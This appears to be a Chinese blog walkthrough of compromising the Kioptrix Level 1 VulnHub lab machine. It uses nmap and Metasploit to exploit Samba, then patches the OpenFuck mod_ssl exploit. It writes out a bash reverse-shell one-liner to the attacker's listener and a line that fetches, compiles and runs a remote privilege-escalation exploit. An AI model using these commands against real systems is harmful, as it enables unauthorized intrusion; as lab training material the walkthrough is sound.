vulnhub 靶机 Kioptrix Level 1渗透笔记

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

kali ip

在这里插入图片描述

信息收集

先使用nmap收集目标的ip地址

nmap -sP 192.168.101.0/24

vulnhub 靶机 Kioptrix Level 1渗透笔记_第1张图片

扫描开放端口

nmap -A -p- 192.168.101.20

vulnhub 靶机 Kioptrix Level 1渗透笔记_第2张图片

这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本

msfconsole
msf6 > use auxiliary/scanner/smb/smb_version                                                                msf6 auxiliary(scanner/smb/smb_version) > show options 

vulnhub 靶机 Kioptrix Level 1渗透笔记_第3张图片

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.101.20
rhosts => 192.168.101.20
msf6 auxiliary(scanner/smb/smb_version) > run

vulnhub 靶机 Kioptrix Level 1渗透笔记_第4张图片

得到版本信息

漏洞利用

使用msf搜索samba

vulnhub 靶机 Kioptrix Level 1渗透笔记_第5张图片

使用这个

vulnhub 靶机 Kioptrix Level 1渗透笔记_第6张图片

注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用

vulnhub 靶机 Kioptrix Level 1渗透笔记_第7张图片

设置完成参数run

vulnhub 靶机 Kioptrix Level 1渗透笔记_第8张图片

成功rce

反弹shell

kali监听1234端口

vulnhub 靶机 Kioptrix Level 1渗透笔记_第9张图片

反弹shell内容如下

bash -i >& /dev/tcp/192.168.101.21/1234 0>&1

vulnhub 靶机 Kioptrix Level 1渗透笔记_第10张图片

反弹成功

第二种漏洞利用(这种方法我没有获得root权限)

在一开始信息收集的时候我们注意到mod_ssl的版本为2.8.4,我们使用searchsploit搜索相关漏洞

vulnhub 靶机 Kioptrix Level 1渗透笔记_第11张图片

我们发现只要mod_ssl版本低于2.8.7即可使用,我们将exp复制出来

vulnhub 靶机 Kioptrix Level 1渗透笔记_第12张图片

对文件做如下修改

1、在25,26行加入头文件

vulnhub 靶机 Kioptrix Level 1渗透笔记_第13张图片

2、第666行url改为

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

在这里插入图片描述

3、第964行,修改为const unsigned char * p, * end;

vulnhub 靶机 Kioptrix Level 1渗透笔记_第14张图片

要运行该程序还需要装一下libssl1.0-dev,否则无法编译

apt-get install libssl1.0-dev
gcc 764.c -o exp -lcrypto
提权

执行完程序即可

./exp 0x6b 192.168.101.20

vulnhub 靶机 Kioptrix Level 1渗透笔记_第15张图片

你可能感兴趣的:(vulnhub靶机渗透,安全)